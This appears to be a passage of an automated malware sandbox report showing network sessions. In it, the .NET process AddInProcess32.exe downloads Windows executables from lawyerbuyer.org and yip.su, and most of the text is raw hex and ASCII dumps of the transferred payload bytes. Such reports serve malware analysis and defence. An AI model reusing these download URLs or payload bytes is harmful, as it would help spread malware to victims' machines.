                                                                                                                                                                                                                                                            Data Ascii: GE^_IFGFGE^_t1|9u$r$pA@$ A@Ir+$t@@$pA@@@@@@@F#Gr$pA@IF#GFGr$pA@F#GFGFGV$pA
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: b0 d4 44 00 ba ac d4 44 00 89 45 e4 85 c0 74 11 39 08 75 2c 8b 48 04 89 4a 04 50 e8 4f e9 ff ff 59 ff 76 04 e8 46 e9 ff ff 59 83 66 04 00 c7 45 fc fe ff ff ff e8 0a 00 00 00 e8 b2 1b 00 00 c3 8b d0 eb c5 6a 0e e8 59 0f 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4 75 d2 8b ff 33 c0 c3 90 1b c0 d1 e0 83 c0 01 c3 f7 c2 01 00 00 00 74 18 8a 02 83 c2 01 3a 01 75 e7 83 c1 01 0a c0 74 dc f7 c2 02 00 00 00 74 a4 66 8b 02 83 c2 02 3a 01 75 ce 0a c0 74 c6 3a 61 01 75 c5 0a e4 74 bd 83 c1 02 eb 88 51 53 55 56 57 ff 35 70 ed 44 00 e8 da 22 00 00 ff 35 6c ed 44 00 8b f0 89 74 24 18 e8 c9 22
                                                                                                                                                                                                                                                            Data Ascii: DDEt9u,HJPOYvFYfEjYYT$L$u<:u.t&:au%t:Aut:auu3t:uttf:ut:autQSUVW5pD"5lDt$"
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1024INData Raw: 33 c0 eb 11 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff 83 c8 ff e8 d7 db ff ff c3 56 57 b8 a4 a8 44 00 bf a4 a8 44 00 3b c7 8b f0 73 0f 8b 06 85 c0 74 02 ff d0 83 c6 04 3b f7 72 f1 5f 5e c3 56 57 b8 ac a8 44 00 bf ac a8 44 00 3b c7 8b f0 73 0f 8b 06 85 c0 74 02 ff d0 83 c6 04 3b f7 72 f1 5f 5e c3 55 8b ec 83 ec 10 a1 64 c0 44 00 83 65 f8 00 83 65 fc 00 53 57 bf 4e e6 40 bb 3b c7 bb 00 00 ff ff 74 0d 85 c3 74 09 f7 d0 a3 68 c0 44 00 eb 60 56 8d 45 f8 50 ff 15 48 e1 40 00 8b 75 fc 33 75 f8 ff 15 44 e1 40 00 33 f0 ff 15 1c e1 40 00 33 f0 ff 15 40 e1 40 00 33 f0 8d 45 f0 50 ff 15 3c e1 40 00 8b 45 f4 33 45 f0 33 f0 3b f7 75 07 be 4f e6 40 bb eb 0b 85 f3 75 07 8b c6 c1 e0 10 0b f0 89 35 64 c0 44 00 f7 d6 89 35 68 c0 44 00 5e 5f 5b c9 c3 57 8b 7c 24 08 8b 07 81
                                                                                                                                                                                                                                                            Data Ascii: 33@eEVWDD;st;r_^VWDD;st;r_^UdDeeSWN@;tthD`VEPH@u3uD@3@3@@3EP<@E3E3;uO@u5dD5hD^_[W|$
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 7c 10 8b 51 04 8b 49 08 8b 34 32 8b 0c 0e 03 ca 03 c1 5e c3 55 8b ec 83 ec 0c 85 ff 75 0a e8 5b 0a 00 00 e9 0a 0a 00 00 83 65 f8 00 83 3f 00 c6 45 ff 00 7e 53 53 56 8b 45 08 8b 40 1c 8b 40 0c 8b 18 85 db 8d 70 04 7e 33 8b 45 f8 c1 e0 04 89 45 f4 8b 4d 08 ff 71 1c 8b 06 50 8b 47 04 03 45 f4 50 e8 6e fd ff ff 83 c4 0c 85 c0 75 0a 4b 83 c6 04 85 db 7f dc eb 04 c6 45 ff 01 ff 45 f8 8b 45 f8 3b 07 7c b1 5e 5b 8a 45 ff c9 c3 6a 04 b8 33 dc 40 00 e8 2e b2 ff ff e8 36 e1 ff ff 83 b8 94 00 00 00 00 74 05 e8 d2 09 00 00 83 65 fc 00 e8 b6 09 00 00 83 4d fc ff e9 74 09 00 00 e8 11 e1 ff ff 8b 4d 08 6a 00 6a 00 89 88 94 00 00 00 e8 ae ad ff ff cc 6a 2c 68 28 ab 44 00 e8 ca d6 ff ff 8b d9 8b 7d 0c 8b 75 08 89 5d e4 83 65 cc 00 8b 47 fc 89 45 dc ff 76 18 8d 45 c4 50 e8
                                                                                                                                                                                                                                                            Data Ascii: |QI42^Uu[e?E~SSVE@@p~3EEMqPGEPnuKEEE;|^[Ej3@.6teMtMjjj,h(D}u]eGEvEP
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1024INData Raw: f8 ff 75 18 50 57 ff 75 20 ff 75 ec e8 8b 11 00 00 8b f0 89 75 f0 83 c4 18 f7 de 1b f6 23 75 f8 57 e8 95 fc ff ff 59 eb 1a ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 15 90 e0 40 00 8b f0 39 5d f4 74 09 ff 75 f4 e8 1f 65 ff ff 59 8b 45 f0 3b c3 74 0c 39 45 18 74 07 50 e8 0c 65 ff ff 59 8b c6 8d 65 e0 5f 5e 5b 8b 4d fc 33 cd e8 4d 61 ff ff c9 c3 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 0d 7f ff ff ff 75 28 8d 4d f0 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c e8 2d fc ff ff 83 c4 20 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 55 8b ec 51 51 a1 64 c0 44 00 33 c5 89 45 fc a1 70 db 44 00 53 56 33 db 3b c3 57 8b f9 75 3a 8d 45 f8 50 33 f6 46 56 68 04 f2 40 00 56 ff 15 84 e0 40 00 85 c0 74 08 89 35 70 db 44 00 eb 34 ff 15 68 e0 40
                                                                                                                                                                                                                                                            Data Ascii: uPWu uu#uWYuuuuuu@9]tueYE;t9EtPeYe_^[M3MaUuMu(Mu$u uuuuu- }tMapUQQdD3EpDSV3;Wu:EP3FVh@V@t5pD4h@
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 00 00 e8 68 61 ff ff ff b6 98 00 00 00 e8 5d 61 ff ff ff b6 9c 00 00 00 e8 52 61 ff ff ff b6 a0 00 00 00 e8 47 61 ff ff ff b6 a4 00 00 00 e8 3c 61 ff ff ff b6 a8 00 00 00 e8 31 61 ff ff 83 c4 2c 5e c3 56 8b 74 24 08 85 f6 74 35 8b 06 3b 05 60 ce 44 00 74 07 50 e8 13 61 ff ff 59 8b 46 04 3b 05 64 ce 44 00 74 07 50 e8 01 61 ff ff 59 8b 76 08 3b 35 68 ce 44 00 74 07 56 e8 ef 60 ff ff 59 5e c3 56 8b 74 24 08 85 f6 74 7e 8b 46 0c 3b 05 6c ce 44 00 74 07 50 e8 d2 60 ff ff 59 8b 46 10 3b 05 70 ce 44 00 74 07 50 e8 c0 60 ff ff 59 8b 46 14 3b 05 74 ce 44 00 74 07 50 e8 ae 60 ff ff 59 8b 46 18 3b 05 78 ce 44 00 74 07 50 e8 9c 60 ff ff 59 8b 46 1c 3b 05 7c ce 44 00 74 07 50 e8 8a 60 ff ff 59 8b 46 20 3b 05 80 ce 44 00 74 07 50 e8 78 60 ff ff 59 8b 76 24 3b 35 84 ce
                                                                                                                                                                                                                                                            Data Ascii: ha]aRaGa<a1a,^Vt$t5;`DtPaYF;dDtPaYv;5hDtV`Y^Vt$t~F;lDtP`YF;pDtP`YF;tDtP`YF;xDtP`YF;|DtP`YF ;DtPx`Yv$;5
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1024INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 68 00 30 00 00 68 00 70 00 00 55 ff d7 68 00 70 00 00 8b f0 68 f8 1e 41 00 56 e8 91 77 00 00 8b 54 24 38 8b 7e 3c 83 c4 0c 53 52 03 fe ff 15 10 02 41 00 8b 83 a4 00 00 00 83 c0 08 50 68 24 1c 41 00 e8 9e 40 00 00 8b 93 a4 00 00 00 8b 44 24 30 83 c4 08 55 6a 04 8d 4c 24 1c 51 83 c2 08 52 50 ff 15 0c 02 41 00 8b 4c 24 14 51 68 24 1c 41 00 e8 6f 40 00 00 8b 44 24 1c 8d 6f 34 83 c4 08 3b 45 00 89 6c 24 20 75 0c 8b 54 24 28 50 52 ff 15 1c 02 41 00 8b 47 50 8b 4d 00 8b 54 24 28 6a 40 68 00 30 00 00 50 51 52 ff 15 cc 00 41 00 85 c0 89 44 24 1c 75 28 ff 15 d4 00 41 00 8b 44 24 28 85 c0 c7 44 24 10 02 00 00 00 0f 84 b7 00 00 00 6a 02 50 ff 15 08 02 41 00 e9 a9 00 00 00 8b 4f 54 8b 54 24 28 6a 00 51 56 50 52 ff 15 18 02 41 00 33 ed 66 39 6f 06 76 47 89 6c 24 18 8b
                                                                                                                                                                                                                                                            Data Ascii: h0hpUhphAVwT$8~<SRAPh$A@D$0UjL$QRPAL$Qh$Ao@D$o4;El$ uT$(PRAGPMT$(j@h0PQRAD$u(AD$(D$jPAOTT$(jQVPRA3f9ovGl$
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1024INData Raw: 24 40 07 00 00 00 66 89 74 24 44 8b 10 8b 52 0c 51 50 ff d2 85 c0 7c 6a 68 18 95 41 00 e8 e9 07 00 00 8b 44 24 10 8b 08 83 c4 04 8d 54 24 10 52 68 80 02 41 00 50 8b 01 ff d0 85 c0 7c 44 68 98 95 41 00 e8 c3 07 00 00 8b 44 24 14 8b 08 8b 51 18 83 c4 04 56 6a 00 50 ff d2 68 00 96 41 00 e8 a7 07 00 00 68 74 96 41 00 e8 9d 07 00 00 8b 44 24 18 8b 08 8b 51 08 83 c4 08 50 c6 44 24 0f 01 ff d2 8b 44 24 18 8b 08 8b 51 08 50 ff d2 8b 44 24 0c 8b 08 8b 51 08 50 ff d2 8b 44 24 14 8b 08 8b 51 08 50 ff d2 ff 15 30 02 41 00 8b 8c 24 54 04 00 00 8a 44 24 0b 5f 5e 33 cc e8 16 00 00 00 8b e5 5d c3 ff 25 40 00 41 00 ff 25 24 02 41 00 ff 25 20 02 41 00 3b 0d 28 c0 41 00 75 02 f3 c3 e9 24 0a 00 00 6a 0c 68 88 99 41 00 e8 97 18 00 00 33 c0 33 f6 39 75 08 0f 95 c0 3b c6 75 1d
                                                                                                                                                                                                                                                            Data Ascii: $@ft$DRQP|jhAD$T$RhAP|DhAD$QVjPhAhtAD$QPD$D$QPD$QPD$QP0A$TD$_^3]%@A%$A% A;(Au$jhA339u;u


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            21192.168.2.555587104.21.63.7144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC134OUTGET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: lawyerbuyer.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC680INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 0
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R3dsf3Yb5VVVjvs6lQ%2B3xK4Uwsw9K24B4KuUVSw9e79HXVI4aQ%2Fn9IOOhMuduGv8tXr2xwtf2DUiExCkvo0RdStDWYhS%2BAyDSCotomexXBx8wNHKGLfIndUFyoqrW46XhSs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628201a6b100ad1-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC689INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 00 66 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0 80 00
                                                                                                                                                                                                                                                            Data Ascii: fff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 6a 00 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66 0f 85
                                                                                                                                                                                                                                                            Data Ascii: jju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: fe ff ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00 8b 7e
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|~
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 00 8d 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt\
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 00 00 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00 a3 34
                                                                                                                                                                                                                                                            Data Ascii: YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,540584
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: c7 ea ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0 fa 80
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02
                                                                                                                                                                                                                                                            Data Ascii: D$9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            22192.168.2.555588172.67.169.8944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC41OUTGET /RNWPd.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: yip.su
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC898INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            memory: 0.36199188232421875
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:56 +0000
                                                                                                                                                                                                                                                            strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
